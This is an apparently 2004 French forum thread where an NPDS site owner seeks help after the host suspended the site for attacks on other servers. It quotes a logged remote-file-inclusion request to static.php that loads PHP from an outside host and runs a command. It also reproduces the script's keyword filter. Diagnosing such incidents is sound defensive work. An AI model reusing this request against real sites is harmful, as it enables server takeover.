logo

NPDS : Gestion de contenu et de communauté


Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
32 visiteur(s) et 1 membre(s) en ligne.
Activité du Site

Pages vues depuis 25/05/2001 : 108 407 472

  • Nb. de membres 8 693
  • Nb. d'articles 1 695
  • Nb. de forums 26
  • Nb. de sujets 8
  • Nb. de critiques 92

Top 10  Statistiques

Index du forum »»  Sécurité »» [Résolu] - NPDS hacké !

[Résolu] - NPDS hacké !#10213

13Contributeur(s)
axelzoheirAnonymeTitoelpipo[-Jarod-]snipedeveloppeurGiamDoclasoGawaxaidadomicilwebservor
3 Modérateur(s)
developpeurjpbJireck
Anonyme Anonymeicon_post
Lut à tous et toutes !
Je viens de recevoir ce mail de mon hébergeur ... plus de NPDS ! envolé !
Avez vous eu ce même genre de roblêmes ... probablement du au CHMOD 777 ....

--------------------------------------------------------------------------------

Votre site a servi à plusieurs reprises pour effectuer des attaques vers d'autres serveurs, probablement par un hackeur se servant de fonctionalités de votre site (possibilité pour quiconque d'uploader des scripts et programmes puis de les exécuter sur votre hébergement). Nous vous invitons notament à consulter les logs d'aujourd'hui 21/Feb/2004:07:08:27 +0100.

De ce fait nous avons été contraints de désactiver votre site. Dès que vous aurez pris les mesures nécessaires pour corriger le problème, nous pourrons le réactiver.

Si vous estimez qu'il y a là un hacking, n'oubliez pas de déposer plainte au commissariat de police le plus proche pour vous prémunir de toute conséquence ultérieure (si vous ne déposez pas plainte vous serez responsable des actions de votre site au cas où les personnes attaquées déposeraient plainte de leur côté).

Bien à vous...
--------------------------------------------------------------------------------



Que faire ?

merci
Anonyme Anonymeicon_post
pas NPDS haché

Ton hebergement Hacké c'est pas pareil
Anonyme Anonymeicon_post
[quote]
Votre site a servi à plusieurs reprises pour effectuer des attaques vers d'autres serveurs, probablement par un hackeur se servant de fonctionalités de votre site
[/quote]

Ya pas un blême de chmod ?
Tito Titoicon_post
tu n'aurais pas un fichier genre CGI-BIN sur ton site ?

Pour les CHMODS, regarde dans les questions fréquentes
Anonyme Anonymeicon_post
Oufti ... voici ce que me répond mon hébergeur ...


Bonjour,

,- - [ Le samedi 21 février 2004 vers 15:44 tanatloc écrivait: ] - -
|
> Que voulez-vous dire ?
> Votre serveur s'est fait hacké à cause de certains CMOD 777 placés sur mon
> site ???
|
`- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Il ne s'agit pas pour nous d'un hacking de notre serveur, seul votre site est concerné.

Nous ne pouvons affirmer que l'usage qui a été fait de votre site était un hacking ou une fonction volontaire, mais il est probable à 99% que ce soit un hacking...

Dans le cas du hacking (vous seul savez si l'usage qui a été fait de votre site d'attaquer des tiers est l'usage normal que vous souhaitez pour votre site ou non), cela signifie que certains de vos scripts/pages contiennent des trous de sécurité permettant à des tiers d'en faire un usage différent de ce que vous souhaitez.

Le cas concret mentionné dans le log précité concerne la page "/static.php" de votre site, qui a été appelée de la façon suivante :

/static.php?op=http://hack0.tripod.com.br/cse.gif?&cmd=id

Si vous visitez http://hack0.tripod.com.br/cse.gif vous constaterez qu'il s'agit de code php, qui a probablement été placé en !include! par votre script et donc exécuté.

Bien à vous...




Heeeeelp que puis-je faire ??? :-(
Anonyme Anonymeicon_post
J'ai NPDS 5.0 installé ...
Tito Titoicon_post
Dev !
La première faille !!!
Enfin, apparemment pcq ç an'affiche pas l'image... :=!
[-Jarod-] [-Jarod-]icon_post
Comment une image en .gif peut contenir du code php?

(g pas tout compris la)
snipe snipeicon_post
c simple tribal

aulieux de dire php tu met .gif :-)

Un !include! se fout de savoir quel extention il inclut.
Parcontre sa me parait bizzard que sa marche comme sa, normalement le contole de securité avant l inclusiont devrait hurlé, je me demande si il a pas modifier son fichier static.
elpipo elpipoicon_post
merde alors ... :#
que puis-je faire ? :-(
changer d'hébergeur ?
je suis actuellement chez www.myown.be ...

merci
snipe snipeicon_post
j aimerai bien savoir le contenu de son static.php, parceque la je me demande si il aurai pas modifier le control de securité.

si il pouver le metre ici sa serait bien.
elpipo elpipoicon_post
le voilà :



<hr noshade class=ONGL>

<?PHP

/************************************************************************/

/* NPDS V : Net Portal Dynamic System */

/* =========================== */

/* */

/* This version name NPDS Copyright (c) 2001-2003 */

/* */

/* This program is free software. You can redistribute it and/or modify */

/* it under the terms of the GNU General Public License as published by */

/* the Free Software Foundation; either version 2 of the License. */

/************************************************************************/

/************************************************************************/

/* You can secur the access to static page by using the methode */

/* describe in model.txt, simply add phpcode to call secur_static */

/* new function (in mainfile.php). */

/* this function accept one param with three values : */

/* - member / admin /adv_m (advance member) */

/* You can also modified the look : */

/* - NPDS=0 => no right blokcs */

/* - NPDS=1 => right blokcs */

/* - NPDS=-1 => no blocks very useful for print Page ! */

/************************************************************************/

if (!isset($mainfile)) { !include!("mainfile.php"); }

global $pdst;



if (($npds!="1") and ($npds!="-1")) {

$pdst=0;

} else {

$pdst=$npds;

}



if ($npds!="-1") {

!include! ("header.php");

}

opentable();

if (($op!="") and ($op)) {

// Troll Control for security

if (eregi("(^[0-9a-z_\.-])",$op) and !stristr($op,".*://") and !stristr($op,"..") and !stristr($op,"../") and !stristr($op, "script") and !stristr($op, "cookie") and !stristr($op, "!iframe!") and !stristr($op, "applet") and !stristr($op, "object") and !stristr($op, "meta")) {

if (file_exists("static/$op")) {

!include! ("static/$op");

// Si vous voulez tracer les appels au pages statiques : supprimer les // devant la ligne ci-dessous

// Ecr_Log("security", "static/$op", "");

}

echo "";

} else {

echo "<center><FONT CLASS=\"ROUGE\">".translate("Please enter information according to the specifications")."</font></center><br>";

}

}

closetable();

if ($npds!="-1") {

!include! ("footer.php");

}

?>

<hr noshade class=ONGL>
developpeur developpeuricon_post
tu est bien certains que c'est cette version qui est actuellement en service sur ton site ???
Anonyme Anonymeicon_post
oui, j'ai directement downloadé le site via ftp sur mon HD que j ai édité
snipe snipeicon_post
la y a un bug, si c bien se fichier la qui est en prod sur ton site, sa peut absolument pas marcher.ou tu te plante ou allors y a un bug quelque part sur leur serveur .
Anonyme Anonymeicon_post
bein oui ... c bien le fichier qui se trouve encore sur mon site ...
elpipo elpipoicon_post
Désolé, je n'étais pas sur ma machine ...

Mais que se passe t il ? :-?
Le fichier static.php a été hacké ?
:-( en tout cas mon site est désactivé par mon hébergeur tant que je n'ai pas résolu le blême ... et comme je suis nullos en php bein ...enfin tant que vous n'avez pas résolu le blême :-D

et donc d'avance merci :#

[ Message édité par : elpipo : 22-02-2004 21:05 ]
developpeur developpeuricon_post
Je viens de vérifier encore (snipe aussi) / static.php NE PEUT PAS faire cela ! en tous les cas le static.php de NPDS

Tu peut faire une copie de ton static.php en production (sur ton site) / tu a encore l'accès en FTP ?
elpipo elpipoicon_post
oui Dev ...
J'ai fais une copie sur mon HD ...
J'ai encore accès à mon ftp aussi ...
je te l'envoi ?

merci encore

[ Message édité par : elpipo : 22-02-2004 21:45 ]
developpeur developpeuricon_post
envoi le ou publie le ici que l'on regarde